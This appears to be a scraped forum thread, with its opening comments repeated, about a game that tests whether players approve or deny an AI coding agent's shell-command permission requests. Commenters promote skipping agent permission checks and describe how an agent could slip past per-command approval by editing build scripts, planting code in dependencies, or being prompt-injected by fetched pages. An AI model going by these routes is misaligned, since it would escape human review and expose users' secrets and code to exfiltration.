Currently you can "cheat" by simply denying all requests as quickly as possible. This will give you the "security-conscious engineer" badge and a perfect score in terms of how many requests were processed. (You will get the "overblock" notification, but it's somewhat tucked away at the bottom and the screen still looks as if you won)
I also tried to play as the hustle4lyfe move fast and break things engineer and simply approved as many requests as quickly as possible - turns out, the "malicious command" popups actually slow you down. Mean!
Fun game, but it showed the lack of security hygiene employed by the game writer. It said `cat ~/.zshrc` was bad because it would share tokens and secrets, but I would never put secrets into my shell rc.
Weird to make reading zshrc supposed unsafe when I happily publish it in my public dotfiles repo... Who the hell keeps API keys in it? OTOH it seems like lots of these AI tools keep appending PATH in it so I guess there's a fundamental misunderstanding of shell best practices in the entire AI space...
Additionally, killing the results of `lsof` is _not_ safe - if, say, you have the web page open in firefox, or a client subshell in the agent itself, then boom, there goes firefox and the agent.
Yeah, the game seems to assert that the kill is safe to run because Claude told me it was safe. But that's the point, I'm not supposed to trust Claude.
Fun little game, but I think the questions jump context so much it's a little unrepresentative. It might be better to group things into "packs", which have more real-world representative structure to them.
For example, lots of "editing something.js" file permission requests, and then an "npm publish" is far more normal, and it's more of a risk, if you're used to pressing Y lots and then suddenly out of the blue...
About three quarters of the "bad" choices are things that not only do I not care about leaking but things that an employer would not punish you for doing, even if it led to a production incident.
The permission thing is a killer to productivity, if you're running Claude I think it's more efficient to just run in a disposable sandbox (like exe.dev[1]) or in some form of docker container with permissions you're personally ok taking the risk with on a personal machine[2]
A disposable sandbox wont protect you from secret exfiltration. Assuming you don't consider your code a secret, you could of course set up your sandbox so it doesn't have any secrets, but that would severely limit the kinds of tasks you can use the agent for.
I got "approve" wrong for `ls -la ~/Documents` but I don't consider simply listing the documents folder a security problem, it's just file names. If it was reading the CONTENTS of them, maybe...
that's a great point, and also the problem with relying on a human-in-the-loop to catch these kind of issues when it can be circumvented even if they were perfect
Agents should make better use of OS sandboxing facilities with finer-grained ACLs.
Less: Do you want to run "npm run build"?
More: "npm run build" tried to read your Chrome cookie database, do you want to allow that?
Some agents like Codex use sandboxing on Linux/MacOS but the permissions are far too coarse - they'll run the command in a relatively strict sandbox and when it fails they'll ask you to allowlist the command as a whole, forever. There should be a new permission prompt every time a command tries to do something new.
Claude suggests (or used to suggest - it's been a while) to allowlist "bash" which completely defeats the point. If you do that the agent can run `bash -c "echo literally anything"`
Not using agents at all. It could edit your code to do something malicious when you run it. Not even once. Not even if the agent has a gun to your head.
I vibe coded a TUI that just shows running lxd containers
I hit 'n' to toggle all network access minus anthropic and openai URLs.
I use pi (sometimes claude, always on bypass) and I auto allow everything. I only toggle manual approval in rare cases like running a script or command that needs to touch a production system and I need to validate everything.
Normally my container has full write access to staging so it can debug and validate everything on its own
Sounds like your process has made you vulnerable to huge classes of exploits and accidents. You have no oversight of changes locally, and only focus on when it touches prod. That means toxic local changes can get in, and if it works in staging why would you look too closely at it before merging to prod? Meanwhile a malicious npm package has made it into your repo, and your staging api keys have been sent to the command and control server.
i can view the diff locally but often times after planning with opus i get what i want.
I create a draft pr and manually review all items before then marking ready for review for the team.
So I'm not blindly pushing things to prod without review.
Without staging key access I wouldn't have been able to do a payment provider migration at this speed. iterating by migrating users in staging and being able to use and validate the sdk quickly with opus is a massive time saver.
Thanks all for checking it out and your suggestions!
If anyone is curious about the actual underlying risks and problems with some mitigations (like the 17% false-negative rates of Auto Mode), I wrote up a quick summary of some of the approaches here
I was told I was over protective when the text said “I need to wipe and build my project” and its first thing to do was to read the details of the (already established) package file. Why did it need to read the package file to “get context” if it was just doing a standard wipe and build?
Apparently me telling it that’s the wrong first step and saying “no” is bad; but I’ve seen AI tools waste a ton of time doing a bunch of random work before they do their job.
I am mostly using OpenCode and barely ever see a permission prompt. While they do enforce it for outside workspace read/write, with the bash tool the agent can just bypass that. I'm not quite sure why it is that way, and it certainly isn't a very good solution, but likely not worse than asking for everything which just trains the user to always accept and provides a false sense of security then.
but actually if you're only removing `node_modules` and you have a working package-lock.json already, what you want is `npm ci`; `npm install` can mutate package-lock.json and potentially expose you to supply chain attacks. If you use `npm ci` I think you don't need to `rm -rf node_modules`, either.
Anyway you should generally run `npm ci` except when you're deliberately updating your actual dependencies. I'd only permit an `npm install` if I was adding or updating a dependency, or I'd just reviewed an `npm ci` failure.
But also why would Claude need to run `rm -rf node_modules && npm install`? Without the context of seeing what changes it’s made, I’d be inclined to assume that Claude has added a new dependency, which I definitely don’t wanna blindly trust it to install
Fun! Played twice and refused all dangerous commands, with only one "over-block". Although I disagree that saying no to `kill $(lsof -t -i:3000)` is over-blocking. It's such a simple command I'd rather run it myself and be fully aware of what process I'm killing.
Interestingly I kept saying no to everything and some how I am a security conscious rare engineer who actually read the commands. Guess doing nothing is the safest approach from security standpoint.
Uh, how is this an overblock? It is literally a destructive command. No way I want an LLM agent rewriting my commit history. What if that commit was already pushed to a protected branch?
Why do you call it destructive? It rewrites history only locally and reversibly (the disappeared commit is still in reflog and can be recovered with another reset) and also doesn't destroy uncommitted changes, so it's quite safe. You can only lose data with it by resetting an unpushed commit and then waiting long enough to let the unreferenced commit be garbage collected.
Buddy, my `${HOME}` is committed to a repository. It includes `.bashrc` and `Documents` directory. These are not scope violations if I'm having the LLM work on them!
To be realistic, 99% of the time it should be a totally innocuous command. If half of the commands are dangerous then you don't get fatigue because you're aware what you're doing is dangerous.
A tool that pushes people into permissions fatigue is in fact the proper recipient of the blame. The tool in question here is the entire system though, including the OS with insufficient permission boundaries in userspace, not just the agent
I'm not saying wedging doorstops under the fire doors is a good thing, I'm just saying look at the situation that's making people put the doorstops there. Or something, it's not a great analogy. I'm just saying that shaming the user belongs with obscurity in the list of security mechanisms that don't work out in practice.
You can turn that off with an option in most agents.
My own agent harness/framework has never had any permission system. It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked.
some of the sandboxing ive been playing with gives me the best of both yolo and like logic programming tier perms on llm actions in env. still not ready for prime time though ;)
Permissions don't do much. They won't save you. You can just skip them completely.
If you are afraid that AI can delete something do what you'd do with potentially malicious user. Sandbox, don't give permission, setup remote backups and so on.
Also (unless prompt injected) models are not eager to start going rouge on your stuff.
But keep in mind a saying “Children don’t hear prohibitions — they hear suggestions.”
Same thing goes for LLMs. Never talk with LLM about deleting stuff. Archiving, moving, retaining elswhere... sure, but never about actually destructive operations. Don't use destructive language.
--dangerously-skip-permissions is the only way to fly. Of course your environment needs to be properly containerized and autobackup set up, so even rm -rf from your harness would do nothing. Life is too short to spend on replying to permissions requests.
I've seen these suggestions but I am really curious about the set up because I just don't get it.
If you want to work on the code then you need to have access to the repositories, so you need the github token. Then, to test the app, you may need your own backend token. And VPN. Of course, only to DEV, of course all tokens encrypted. So, only DEV and your branch of the code is in danger. In my view, even that is pretty bad.
You could clone the repo yourself and not give the agent any tokens at all. When done, push it yourself. This also lets you sandbox the agent to only have access to the local repo and nothing else.
I haven't run claude code without --dangerously-skip-permissions in quite some time. I'm surprised that it's still the norm to endure permission spamming?
Here's the threat model I (a luddite) use to evaluate these. The claude code harness can be mostly trusted, the model cannot be trusted because it is exposed to untrusted data from the internet, and there is no separation of data/code in an llm [0][1].
I want to avoid running untrusted code on my local machine, because it could steal secrets, install malware, etc.
Since the model is allowed to write without restriction (I think) to the project directory, anything in the project directory is also untrusted. Running standard commands from the system is fine, as long as you know what those commands are going to do. Running anything from the local directory should be avoided because the code is untrusted.
This is just one security model, there are many others! If a person is running claude in a stronger sandbox, that changes the model considerably. What threat model do you use to evaluate whether an agent's actions are safe?
This is amazing!
Currently you can "cheat" by simply denying all requests as quickly as possible. This will give you the "security-conscious engineer" badge and a perfect score in terms of how many requests were processed. (You will get the "overblock" notification, but it's somewhat tucked away at the bottom and the screen still looks as if you won)
I also tried to play as the hustle4lyfe move fast and break things engineer and simply approved as many requests as quickly as possible - turns out, the "malicious command" popups actually slow you down. Mean!
Good catch, this has now been nerfed and this approach has gotten its own title
Glad I could help. I love the new title :D
Top 18%! I denied everything, unless I could see at a glance that it was safe (like Git diff)
Just like real life! deny it from doing anything and you're safe :)
Fun game, but it showed the lack of security hygiene employed by the game writer. It said `cat ~/.zshrc` was bad because it would share tokens and secrets, but I would never put secrets into my shell rc.
Plenty of people would. But then I guess they're in env and probably already available to Claude
Where would you put them?
Presumably a CLI-accessible password manager (like `pass`) or a GPG-encrypted file (like a netrc-style `~/.authinfo.gpg`).
I put mine in various aes encrypted file (like `~/.secrets.aes`) and then source it explicitly when needed with:
I have a handful of aliases/functions to make it more smooth, but that's the core.Where are those aliases stored?
In that AES encrypted file.
It's a shellscript that they encrypted. They decrypt it and feed the decrypted output immediately into the shell, to be sourced.
That encrypted secrets file could contain any shellscript, so the aliases are stored in there, together with the API-Keys and passwords.
Into `pass`, for example:
https://news.ycombinator.com/item?id=48108207
Weird to make reading zshrc supposed unsafe when I happily publish it in my public dotfiles repo... Who the hell keeps API keys in it? OTOH it seems like lots of these AI tools keep appending PATH in it so I guess there's a fundamental misunderstanding of shell best practices in the entire AI space...
Additionally, killing the results of `lsof` is _not_ safe - if, say, you have the web page open in firefox, or a client subshell in the agent itself, then boom, there goes firefox and the agent.
Yeah, the game seems to assert that the kill is safe to run because Claude told me it was safe. But that's the point, I'm not supposed to trust Claude.
Fun little game, but I think the questions jump context so much it's a little unrepresentative. It might be better to group things into "packs", which have more real-world representative structure to them. For example, lots of "editing something.js" file permission requests, and then an "npm publish" is far more normal, and it's more of a risk, if you're used to pressing Y lots and then suddenly out of the blue...
About three quarters of the "bad" choices are things that not only do I not care about leaking but things that an employer would not punish you for doing, even if it led to a production incident.
The permission thing is a killer to productivity, if you're running Claude I think it's more efficient to just run in a disposable sandbox (like exe.dev[1]) or in some form of docker container with permissions you're personally ok taking the risk with on a personal machine[2]
[1] - https://exe.dev/ is a new cloud provider with some very useful agent UX [2] - I built https://github.com/stanislavkozlovski/dclaude/ for this; not perfect but gets my job done on the rare occassion I need to run the coding agent locally
A disposable sandbox wont protect you from secret exfiltration. Assuming you don't consider your code a secret, you could of course set up your sandbox so it doesn't have any secrets, but that would severely limit the kinds of tasks you can use the agent for.
[delayed]
I got "approve" wrong for `ls -la ~/Documents` but I don't consider simply listing the documents folder a security problem, it's just file names. If it was reading the CONTENTS of them, maybe...
That's funny. It told me that blocking "npm run build" was the wrong answer. Maybe it doesn't really under The threat model.
That's a great example of how dangerous actions are perceived as innocent. The entire model of approving specific commands is absolutely bonkers.
npm run build = run an arbitrary shell command written in package.json
Meanwhile the agent could have done any of the following without approval:
- edited `package.json` to contain any arbitrary build command
- planted malicious code in `build.js` (called by `npm run build`)
- planted malicious code in `node_modules/xyz/index.js` (imported by `build.js`)
Yup. The most secure computer is one encased in concrete and dropped into the ocean.
Concrete alone isn't enough, you also need to have it be enclosed in a Faraday Cage.
that's a great point, and also the problem with relying on a human-in-the-loop to catch these kind of issues when it can be circumvented even if they were perfect
What would a better system look like?
Agents should make better use of OS sandboxing facilities with finer-grained ACLs.
Less: Do you want to run "npm run build"?
More: "npm run build" tried to read your Chrome cookie database, do you want to allow that?
Some agents like Codex use sandboxing on Linux/MacOS but the permissions are far too coarse - they'll run the command in a relatively strict sandbox and when it fails they'll ask you to allowlist the command as a whole, forever. There should be a new permission prompt every time a command tries to do something new.
Claude suggests (or used to suggest - it's been a while) to allowlist "bash" which completely defeats the point. If you do that the agent can run `bash -c "echo literally anything"`
Not using agents at all. It could edit your code to do something malicious when you run it. Not even once. Not even if the agent has a gun to your head.
I vibe coded a TUI that just shows running lxd containers
I hit 'n' to toggle all network access minus anthropic and openai URLs.
I use pi (sometimes claude, always on bypass) and I auto allow everything. I only toggle manual approval in rare cases like running a script or command that needs to touch a production system and I need to validate everything.
Normally my container has full write access to staging so it can debug and validate everything on its own
Sounds like your process has made you vulnerable to huge classes of exploits and accidents. You have no oversight of changes locally, and only focus on when it touches prod. That means toxic local changes can get in, and if it works in staging why would you look too closely at it before merging to prod? Meanwhile a malicious npm package has made it into your repo, and your staging api keys have been sent to the command and control server.
i can view the diff locally but often times after planning with opus i get what i want.
I create a draft pr and manually review all items before then marking ready for review for the team.
So I'm not blindly pushing things to prod without review.
Without staging key access I wouldn't have been able to do a payment provider migration at this speed. iterating by migrating users in staging and being able to use and validate the sdk quickly with opus is a massive time saver.
Thanks all for checking it out and your suggestions!
If anyone is curious about the actual underlying risks and problems with some mitigations (like the 17% false-negative rates of Auto Mode), I wrote up a quick summary of some of the approaches here
https://scalex.dev/blog/ai-agent-permissions/
You might want to check out https://github.com/kstenerud/yoloai
I haven't used local agentic AI yet for programming projects. Hence, -187 score
The filter for "commands I would run myself" and "commands I would let an agent run" are very different it seems.
Thinking about agents as remote junior devs who _might_ be North Korean operatives has been the right model for me.
I was told I was over protective when the text said “I need to wipe and build my project” and its first thing to do was to read the details of the (already established) package file. Why did it need to read the package file to “get context” if it was just doing a standard wipe and build?
Apparently me telling it that’s the wrong first step and saying “no” is bad; but I’ve seen AI tools waste a ton of time doing a bunch of random work before they do their job.
I am mostly using OpenCode and barely ever see a permission prompt. While they do enforce it for outside workspace read/write, with the bash tool the agent can just bypass that. I'm not quite sure why it is that way, and it certainly isn't a very good solution, but likely not worse than asking for everything which just trains the user to always accept and provides a false sense of security then.
A bit too JavaScript specific... can't really play if you don't know that ecosystem.
This is one of two reasons why I wrote yoloAI. I never get these permission prompts anymore. It feels a lot like after installing an adblocker.
I got "overblocked" for this one:
but actually if you're only removing `node_modules` and you have a working package-lock.json already, what you want is `npm ci`; `npm install` can mutate package-lock.json and potentially expose you to supply chain attacks. If you use `npm ci` I think you don't need to `rm -rf node_modules`, either.Anyway you should generally run `npm ci` except when you're deliberately updating your actual dependencies. I'd only permit an `npm install` if I was adding or updating a dependency, or I'd just reviewed an `npm ci` failure.
But also why would Claude need to run `rm -rf node_modules && npm install`? Without the context of seeing what changes it’s made, I’d be inclined to assume that Claude has added a new dependency, which I definitely don’t wanna blindly trust it to install
thanks for the pointer! renamed it to npm ci so it's still 'safe'
It would be cool to see the distribution of all player scores.
That's a great idea, stay tuned
and added! Made one for each stat separately
Fun! Played twice and refused all dangerous commands, with only one "over-block". Although I disagree that saying no to `kill $(lsof -t -i:3000)` is over-blocking. It's such a simple command I'd rather run it myself and be fully aware of what process I'm killing.
Interestingly I kept saying no to everything and some how I am a security conscious rare engineer who actually read the commands. Guess doing nothing is the safest approach from security standpoint.
Reminds me of the "Papers, please" game. Glory to Arstotzka!
Pressed 1 for everything, no regrets
Very fun. I can only imagine building this with Claude and testing needed a bit of mental concentration.
git reset --soft HEAD~1
Uh, how is this an overblock? It is literally a destructive command. No way I want an LLM agent rewriting my commit history. What if that commit was already pushed to a protected branch?
Why do you call it destructive? It rewrites history only locally and reversibly (the disappeared commit is still in reflog and can be recovered with another reset) and also doesn't destroy uncommitted changes, so it's quite safe. You can only lose data with it by resetting an unpushed commit and then waiting long enough to let the unreferenced commit be garbage collected.
Commit history is data. I might not realize what happened until the gc happens.
That was fun and gave me an idea how security conscious I am.
claude --dangerously-skip-permissions
just give in
Sadly unplayable - gray text on a black background is very hard to read on a phone
that was soooo last month, “auto-mode” is the way now
another agent reviews every command and blocks destructive ones
Scope Violation: `cat ~/.zshrc`
Scope Violation: `ls ~/Documents`
Buddy, my `${HOME}` is committed to a repository. It includes `.bashrc` and `Documents` directory. These are not scope violations if I'm having the LLM work on them!
Continue? Y/N ── SCORE: 2,343 Security-Conscious Engineer
Caught 8/8 threats "Not a single secret leaked"
→ llmgame.scalex.dev
Continue? Y/N ── SCORE: 1,549 Security-Conscious Engineer
Caught 3/3 threats "Not a single secret leaked"
So are there 3 threats? 8? Is it a different game?
Does everyone get a "good" score even if they missed 5 threats?!
It's a game you play over one minute. They probably saw more prompts than you.
To be realistic, 99% of the time it should be a totally innocuous command. If half of the commands are dangerous then you don't get fatigue because you're aware what you're doing is dangerous.
Fun game. Can somebody run an agent against those questions to see how it performs? :)
Use this and save yourself:
claude --dangerously-skip-permissions
Just make sure to run it in an isolated environment where it's ok to mess things up, and make sure it doesn't have access to any secrets.
This is why having a human in the loop isn't enough because they will cut corners and skip reviewing what they should review.
I created a watcher for this problem, to watch my PRs for unfinished scope and have a fresh Claude review
Uses tmux and gh https://github.com/Kyu/claude-pr-watch
A tool that pushes people into permissions fatigue is in fact the proper recipient of the blame. The tool in question here is the entire system though, including the OS with insufficient permission boundaries in userspace, not just the agent
A tool that bypasses permission requests because they’re annoying will be just as guilty when the repo is poisoned.
I'm not saying wedging doorstops under the fire doors is a good thing, I'm just saying look at the situation that's making people put the doorstops there. Or something, it's not a great analogy. I'm just saying that shaming the user belongs with obscurity in the list of security mechanisms that don't work out in practice.
It’s baking malicious code into your project, but hey it didn’t run rm -rf so… we’re good.
Why would you do this now that we have auto mode?
I love it when Claude is dangerous
I got tired of typing that and just do
I do have a separate "claude" user on my system without sudo access and without access to my main user home dirAnd yeah I know that's not perfect but I'm trying to get shit done
alias claude+="claude --dangerously-skip-permissions"
alias claude++="claude --dangerously-skip-permissions --continue"
You can turn that off with an option in most agents.
My own agent harness/framework has never had any permission system. It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked.
> It's also never deleted anything it shouldn't or done anything crazy or unrelated to what I asked
Until it does. A simple curl request to a compromised website could inject a malicious prompt into it.
How many car accidents have you been in, and do you wear your seatbelt when you're in a car?
some of the sandboxing ive been playing with gives me the best of both yolo and like logic programming tier perms on llm actions in env. still not ready for prime time though ;)
1,640 points on my first try—I fell into a few traps, but it was really interesting. Thanks for the little game! I'm sharing it with my coworkers :)
Permissions don't do much. They won't save you. You can just skip them completely.
If you are afraid that AI can delete something do what you'd do with potentially malicious user. Sandbox, don't give permission, setup remote backups and so on.
Also (unless prompt injected) models are not eager to start going rouge on your stuff.
But keep in mind a saying “Children don’t hear prohibitions — they hear suggestions.”
Same thing goes for LLMs. Never talk with LLM about deleting stuff. Archiving, moving, retaining elswhere... sure, but never about actually destructive operations. Don't use destructive language.
--dangerously-skip-permissions is the only way to fly. Of course your environment needs to be properly containerized and autobackup set up, so even rm -rf from your harness would do nothing. Life is too short to spend on replying to permissions requests.
I've seen these suggestions but I am really curious about the set up because I just don't get it.
If you want to work on the code then you need to have access to the repositories, so you need the github token. Then, to test the app, you may need your own backend token. And VPN. Of course, only to DEV, of course all tokens encrypted. So, only DEV and your branch of the code is in danger. In my view, even that is pretty bad.
So, how does such a set up work?
You could clone the repo yourself and not give the agent any tokens at all. When done, push it yourself. This also lets you sandbox the agent to only have access to the local repo and nothing else.
Lol. Countdown til you get pwned starts today. Let me know how that works out for you in six months.
"Auto" in Claude and "Auto-review" in Codex are the only way to do agentic coding.
I haven't run claude code without --dangerously-skip-permissions in quite some time. I'm surprised that it's still the norm to endure permission spamming?
(I run it on a VPS of course, not my laptop)
Nice got 6/6
This current thread is proof of AI psychosis.
What the hell is going on in this thread? This isn't good. The "threats" don't make sense. Oh no, all the sensitive information in my package.json...
Here's the threat model I (a luddite) use to evaluate these. The claude code harness can be mostly trusted, the model cannot be trusted because it is exposed to untrusted data from the internet, and there is no separation of data/code in an llm [0][1].
I want to avoid running untrusted code on my local machine, because it could steal secrets, install malware, etc.
Since the model is allowed to write without restriction (I think) to the project directory, anything in the project directory is also untrusted. Running standard commands from the system is fine, as long as you know what those commands are going to do. Running anything from the local directory should be avoided because the code is untrusted.
This is just one security model, there are many others! If a person is running claude in a stronger sandbox, that changes the model considerably. What threat model do you use to evaluate whether an agent's actions are safe?
[0]: https://www.schneier.com/essays/archives/2024/05/llms-data-c... [1]: https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
If you think the worst that an agent can do is leak your package.json, your threat model is wayyy broken.
Score is 6711 by just saying no to everything